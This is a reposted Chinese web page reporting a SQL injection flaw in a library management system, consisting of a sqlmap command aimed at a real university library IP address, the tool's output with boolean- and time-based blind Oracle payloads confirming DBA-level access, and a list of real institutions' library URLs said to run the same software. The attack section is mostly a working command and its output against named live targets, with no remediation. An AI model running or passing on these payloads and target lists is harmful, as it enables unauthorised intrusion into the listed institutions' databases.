最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
科技
当前位置: 首页 - 科技 - 知识百科 - 正文

某通用图书馆管理系统SQL注入_MySQL

来源:动视网 责编:小采 时间:2020-11-09 19:18:21
文档

某通用图书馆管理系统SQL注入_MySQL

某通用图书馆管理系统SQL注入_MySQL:某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspxID=123 --is-dba sqlmap identified the following injection points with a total
推荐度:
点击下载本文 文档为doc格式
导读某通用图书馆管理系统SQL注入_MySQL:某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspxID=123 --is-dba sqlmap identified the following injection points with a total


某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。

sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=123 AND 7478=7478

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)
---
[11:34:18] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[11:34:18] [INFO] testing if current user is DBA
current user is DBA: True
[11:34:25] [INFO] fetched data logged to text files under '/Users/Leek/Desktop/sqlmap-dev/output/219.242.65.10'


DBA==True
在它的客户名单里测试了几个,
国家图书馆中央社会主义分馆:http://www.zysylib.org.cn/
中国科学院物理研究所:http://libiop.iphy.ac.cn/
中国科学院软研所:http://124.16.136.160:8083/iscas_lib/
还有各种大学用户,
中国矿业大学:http://219.242.65.10/fsweb/Default.aspx
华东交通大学:http://lib.ecjtu.jx.cn:80/gdweb
华北科技学院:http://211.81.174.140/

文档

某通用图书馆管理系统SQL注入_MySQL

某通用图书馆管理系统SQL注入_MySQL:某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspxID=123 --is-dba sqlmap identified the following injection points with a total
推荐度:
点击下载本文 文档为doc格式
标签: 图书馆 通用 sql
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
产品服务 发展历程 企业资讯 企业文化 关于我们 加入我们 联系我们 网站导航 网站律师

Copyright © 2019-2025 51dongshi.net 版权所有

赣ICP备2023002352号-34

违法及侵权请联系:TEL:177 7030 7066 E-MAIL:11247931@qq.com 本站由北京市万商天勤律师事务所王兴未律师提供法律服务

Top